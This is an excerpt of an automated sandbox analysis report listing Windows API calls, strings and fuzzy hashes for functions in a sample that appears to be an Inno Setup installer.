                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                    • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                    • API String ID: 2610873146-3407710046
                                                                                    • Opcode ID: c8ec920afe0f29cf0b992a0366f0fdec1bc44dc6b16cd197f8c896cb5c85a552
                                                                                    • Instruction ID: fd6996cff919b5887080f465a26ac3447cdf71e0405d1b359808dab19ab714f4
                                                                                    • Opcode Fuzzy Hash: c8ec920afe0f29cf0b992a0366f0fdec1bc44dc6b16cd197f8c896cb5c85a552
                                                                                    • Instruction Fuzzy Hash: A7210771704B006BD300D664CD41F7B36D4EB85710F08052AFA84EB382EAB8DD018A9A
                                                                                    APIs
                                                                                    • GetActiveWindow.USER32 ref: 0042F008
                                                                                    • GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F01C
                                                                                    • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F029
                                                                                    • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F036
                                                                                    • GetWindowRect.USER32(?,00000000), ref: 0042F082
                                                                                    • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F0C0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                    • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                    • API String ID: 2610873146-3407710046
                                                                                    • Opcode ID: a2ca17b2d76e23ba006245a128424af3baa9758b9a44ccde8e18ffc37df72414
                                                                                    • Instruction ID: f3027618da4b71ab9256091943579cea75a3e5d7718dd7814224cb4ba64d2bd0
                                                                                    • Opcode Fuzzy Hash: a2ca17b2d76e23ba006245a128424af3baa9758b9a44ccde8e18ffc37df72414
                                                                                    • Instruction Fuzzy Hash: 4D21A4767017146FD3109668DC81F3B37A9EB84B14F98453AF984DB382EA78EC048B99
                                                                                    APIs
                                                                                    • CoCreateInstance.OLE32(00498A68,00000000,00000001,00498774,?,00000000,00455D42), ref: 00455AC2
                                                                                    • CoCreateInstance.OLE32(00498764,00000000,00000001,00498774,?,00000000,00455D42), ref: 00455AE8
                                                                                    • SysFreeString.OLEAUT32(?), ref: 00455C47
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateInstance$FreeString
                                                                                    • String ID: CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue$IShellLink::QueryInterface
                                                                                    • API String ID: 308859552-2052886881
                                                                                    • Opcode ID: ebdf87ccfab337f77d2b3a02e23e2a4bb1bec213dc2f62e181b913a44b0cdb8b
                                                                                    • Instruction ID: 75ae484d58e3d3074f9f089aff153db97feeda1b73ba6cb4122c168b6c8c5e36
                                                                                    • Opcode Fuzzy Hash: ebdf87ccfab337f77d2b3a02e23e2a4bb1bec213dc2f62e181b913a44b0cdb8b
                                                                                    • Instruction Fuzzy Hash: 76915171A00604AFDB40DFA9C895BAE77F8AF09305F14446AF904EB262DB78DD08CB59
                                                                                    APIs
                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,0045851B,?,00000000,0045857E,?,?,02193858,00000000), ref: 00458399
                                                                                    • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02193858,?,00000000,004584B0,?,00000000,00000001,00000000,00000000,00000000,0045851B), ref: 004583F6
                                                                                    • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02193858,?,00000000,004584B0,?,00000000,00000001,00000000,00000000,00000000,0045851B), ref: 00458403
                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 0045844F
                                                                                    • GetOverlappedResult.KERNEL32(?,?,00000000,00000001,00458489,?,-00000020,0000000C,-00004034,00000014,02193858,?,00000000,004584B0,?,00000000), ref: 00458475
                                                                                    • GetLastError.KERNEL32(?,?,00000000,00000001,00458489,?,-00000020,0000000C,-00004034,00000014,02193858,?,00000000,004584B0,?,00000000), ref: 0045847C
                                                                                      • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                                                    • String ID: CreateEvent$TransactNamedPipe
                                                                                    • API String ID: 2182916169-3012584893
                                                                                    • Opcode ID: 0ff1c438b132bceec0e64107844f3ac802b474508007314b00136eaef8a58c4e
                                                                                    • Instruction ID: 22acba0fcf61382a58efe17371b9c4a56388ad6b02d4dd4833f4e79bb834958c
                                                                                    • Opcode Fuzzy Hash: 0ff1c438b132bceec0e64107844f3ac802b474508007314b00136eaef8a58c4e
                                                                                    • Instruction Fuzzy Hash: 8641A475A00608AFDB15DF95CD81F9EB7F8FB49714F1040AAF904F7292DA789E44CA28
                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,0045607D,?,?,00000031,?), ref: 00455F40
                                                                                    • GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00455F46
                                                                                    • LoadTypeLib.OLEAUT32(00000000,?), ref: 00455F93
                                                                                      • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressErrorHandleLastLoadModuleProcType
                                                                                    • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                                                    • API String ID: 1914119943-2711329623
                                                                                    • Opcode ID: 789ee19f92c60064ad7d583355d3075d4ba7a51ebd8b6007120108efd0616a1c
                                                                                    • Instruction ID: 464ca0410b994955771bbd6b79a2bac712fdb799e88c0b9d306e26cdd2de6b74
                                                                                    • Opcode Fuzzy Hash: 789ee19f92c60064ad7d583355d3075d4ba7a51ebd8b6007120108efd0616a1c
                                                                                    • Instruction Fuzzy Hash: 2231C471B00604AFCB10EFAACD51E5BB7BEEB89B11B518466FC04D3292DA78DD05C768
                                                                                    APIs
                                                                                    • RectVisible.GDI32(?,?), ref: 00416E23
                                                                                    • SaveDC.GDI32(?), ref: 00416E37
                                                                                    • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E5A
                                                                                    • RestoreDC.GDI32(?,?), ref: 00416E75
                                                                                    • CreateSolidBrush.GDI32(00000000), ref: 00416EF5
                                                                                    • FrameRect.USER32(?,?,?), ref: 00416F28
                                                                                    • DeleteObject.GDI32(?), ref: 00416F32
                                                                                    • CreateSolidBrush.GDI32(00000000), ref: 00416F42
                                                                                    • FrameRect.USER32(?,?,?), ref: 00416F75
                                                                                    • DeleteObject.GDI32(?), ref: 00416F7F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                                    • String ID:
                                                                                    • API String ID: 375863564-0
                                                                                    • Opcode ID: 64b03b7e0dfbfe231859d70345d3e0f57f9c7ec518debabf741e30dcc0fb8ff1
                                                                                    • Instruction ID: 305d9ddf0f7240c011be45b7bb8b7ddc49b42f68556790db257713301bb8c367
                                                                                    • Opcode Fuzzy Hash: 64b03b7e0dfbfe231859d70345d3e0f57f9c7ec518debabf741e30dcc0fb8ff1
                                                                                    • Instruction Fuzzy Hash: FC514C712086445FDB54EF69C8C0B9777E8AF48314F15466AFD488B287C738EC85CB99
                                                                                    APIs
                                                                                    • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
                                                                                    • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
                                                                                    • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
                                                                                    • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
                                                                                    • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
                                                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
                                                                                    • GetFileType.KERNEL32(?,000000F5), ref: 00404C11
                                                                                    • CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
                                                                                    • GetLastError.KERNEL32(000000F5), ref: 00404C46
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                    • String ID:
                                                                                    • API String ID: 1694776339-0
                                                                                    • Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                    • Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
                                                                                    • Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                    • Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D
                                                                                    APIs
                                                                                    • GetSystemMenu.USER32(00000000,00000000), ref: 00422243
                                                                                    • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422261
                                                                                    • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042226E
                                                                                    • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042227B
                                                                                    • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422288
                                                                                    • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00422295
                                                                                    • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 004222A2
                                                                                    • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 004222AF
                                                                                    • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222CD
                                                                                    • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222E9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$Delete$EnableItem$System
                                                                                    • String ID:
                                                                                    • API String ID: 3985193851-0
                                                                                    • Opcode ID: 02d38efaefe46f0e9bc3abe3cfd80dc8f7ad5e6e4bcf4392d2612e5af0a0388e
                                                                                    • Instruction ID: b791af981bedf3385b2dd143af085cc0c004e448fbd85fce69a0ff0a91ac5271
                                                                                    • Opcode Fuzzy Hash: 02d38efaefe46f0e9bc3abe3cfd80dc8f7ad5e6e4bcf4392d2612e5af0a0388e
                                                                                    • Instruction Fuzzy Hash: 35213370340744BAE720D725DD8BF9B7BD89B04718F4440A5BA487F2D7C7F9AA80869C
                                                                                    APIs
                                                                                    • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453353
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: PrivateProfileStringWrite
                                                                                    • String ID: $pI$.tmp$MoveFileEx$NUL$WININIT.INI$[rename]$oI
                                                                                    • API String ID: 390214022-3415521383
                                                                                    • Opcode ID: 4cfdaec4cf45cb6b31dd2cede704c04f2930a939beeeeed92986428e7fe6f80d
                                                                                    • Instruction ID: ce58c644a57a5931bfb3eb4b41fd184989c95ed3aef939848703120becc63cdc
                                                                                    • Opcode Fuzzy Hash: 4cfdaec4cf45cb6b31dd2cede704c04f2930a939beeeeed92986428e7fe6f80d
                                                                                    • Instruction Fuzzy Hash: 22910734E0010DABDB11EFA5C852BDEB7B5EF49346F508467E800B7392D778AE498B58
                                                                                    APIs
                                                                                    • FreeLibrary.KERNEL32(10000000), ref: 0047FFC4
                                                                                    • FreeLibrary.KERNEL32(02470000), ref: 0047FFD8
                                                                                    • SendNotifyMessageA.USER32(00010480,00000496,00002710,00000000), ref: 0048004A
                                                                                    Strings
                                                                                    • Not restarting Windows because Setup is being run from the debugger., xrefs: 0047FFF9
                                                                                    • GetCustomSetupExitCode, xrefs: 0047FE79
                                                                                    • Restarting Windows., xrefs: 00480025
                                                                                    • DeinitializeSetup, xrefs: 0047FED5
                                                                                    • Deinitializing Setup., xrefs: 0047FE3A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeLibrary$MessageNotifySend
                                                                                    • String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
                                                                                    • API String ID: 3817813901-1884538726
                                                                                    • Opcode ID: 3e65ccf6202abbdfd793ce9802210bad3c829859d96f97b0f1010f0964bcdbc0
                                                                                    • Instruction ID: a364eb3419ca1f30a9e3eb44d73b76d56ae546640220791ead322ba595580ec3
                                                                                    • Opcode Fuzzy Hash: 3e65ccf6202abbdfd793ce9802210bad3c829859d96f97b0f1010f0964bcdbc0
                                                                                    • Instruction Fuzzy Hash: C351A1316002009FD721EB69F945B5A7BE4EB1A314F51847BF805C73A2DB389848CB99
                                                                                    APIs
                                                                                    • SHGetMalloc.SHELL32(?), ref: 00460DEF
                                                                                    • GetActiveWindow.USER32 ref: 00460E53
                                                                                    • CoInitialize.OLE32(00000000), ref: 00460E67
                                                                                    • SHBrowseForFolder.SHELL32(?), ref: 00460E7E
                                                                                    • CoUninitialize.OLE32(00460EBF,00000000,?,?,?,?,?,00000000,00460F43), ref: 00460E93
                                                                                    • SetActiveWindow.USER32(?,00460EBF,00000000,?,?,?,?,?,00000000,00460F43), ref: 00460EA9
                                                                                    • SetActiveWindow.USER32(?,?,00460EBF,00000000,?,?,?,?,?,00000000,00460F43), ref: 00460EB2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                     • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ActiveWindow$BrowseFolderInitializeMallocUninitialize
                                                                                    • String ID: A
                                                                                    • API String ID: 2684663990-3554254475
                                                                                    • Opcode ID: 2477b1493d95c66d93d73e99a730f240e77ae973ab02a92069b792ba0dab2901
                                                                                    • Instruction ID: e80b4c5213709972e599e89028d95aa00c835143d3680f9f001b64d6594dadc3
                                                                                    • Opcode Fuzzy Hash: 2477b1493d95c66d93d73e99a730f240e77ae973ab02a92069b792ba0dab2901
                                                                                    • Instruction Fuzzy Hash: 8C3130B0D00218AFDB01EFB6D885A9EBBF8EB09304F51447AF914F7251E7789A04CB59
                                                                                    APIs
                                                                                    • GetFileAttributesA.KERNEL32(00000000,00000000,00471A59,?,?,?,00000008,00000000,00000000,00000000,?,00471CB5,?,?,00000000,00471F1C), ref: 004719BC
                                                                                      • Part of subcall function 0042CD60: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CDD6
                                                                                      • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496BB5,00000000,00496C0A,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                                                    • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00471A59,?,?,?,00000008,00000000,00000000,00000000,?,00471CB5), ref: 00471A33
                                                                                    • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00471A59,?,?,?,00000008,00000000,00000000,00000000), ref: 00471A39
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
                                                                                    • String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
                                                                                    • API String ID: 884541143-1710247218
                                                                                    • Opcode ID: 166f044b85d341f0b6ee90afdeb19f2146d980d02c7b22180f5b46b241ce676d
                                                                                    • Instruction ID: 88fb20351202849850a9607c8ed9a5972d7e7c37514b441dc4b5c3053575b9e2
                                                                                    • Opcode Fuzzy Hash: 166f044b85d341f0b6ee90afdeb19f2146d980d02c7b22180f5b46b241ce676d
                                                                                    • Instruction Fuzzy Hash: 8111E2307005147BD711EA6ECC82B9E73ACDB45714FA1813BB405B72E1DB3C9E02865C
                                                                                    APIs
                                                                                    • GetProcAddress.KERNEL32(02470000,inflateInit_), ref: 0045C9DD
                                                                                    • GetProcAddress.KERNEL32(02470000,inflate), ref: 0045C9ED
                                                                                    • GetProcAddress.KERNEL32(02470000,inflateEnd), ref: 0045C9FD
                                                                                    • GetProcAddress.KERNEL32(02470000,inflateReset), ref: 0045CA0D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc
                                                                                    • String ID: inflate$inflateEnd$inflateInit_$inflateReset
                                                                                    • API String ID: 190572456-3516654456
                                                                                    • Opcode ID: 311722acbfa37a17bdf68912e4e87f1f7738553d6cb20796f4da0de6e3995170
                                                                                    • Instruction ID: ca09fd674ca76a7276795bdcbb2c408d45c762c24a12309d3e7b68c52f970bbc
                                                                                    • Opcode Fuzzy Hash: 311722acbfa37a17bdf68912e4e87f1f7738553d6cb20796f4da0de6e3995170
                                                                                    • Instruction Fuzzy Hash: A7011AB0901304DEEB14DF36BEC97273AA5E760B56F14D03B9C55992A2D7780848CB9C
                                                                                    APIs
                                                                                    • SetBkColor.GDI32(?,00000000), ref: 0041A9C9
                                                                                    • 73A14D40.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020,?,00000000), ref: 0041AA03
                                                                                    • SetBkColor.GDI32(?,?), ref: 0041AA18
                                                                                    • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA62
                                                                                    • SetTextColor.GDI32(00000000,00000000), ref: 0041AA6D
                                                                                    • SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA7D
                                                                                    • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AABC
                                                                                    • SetTextColor.GDI32(00000000,00000000), ref: 0041AAC6
                                                                                    • SetBkColor.GDI32(00000000,?), ref: 0041AAD3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
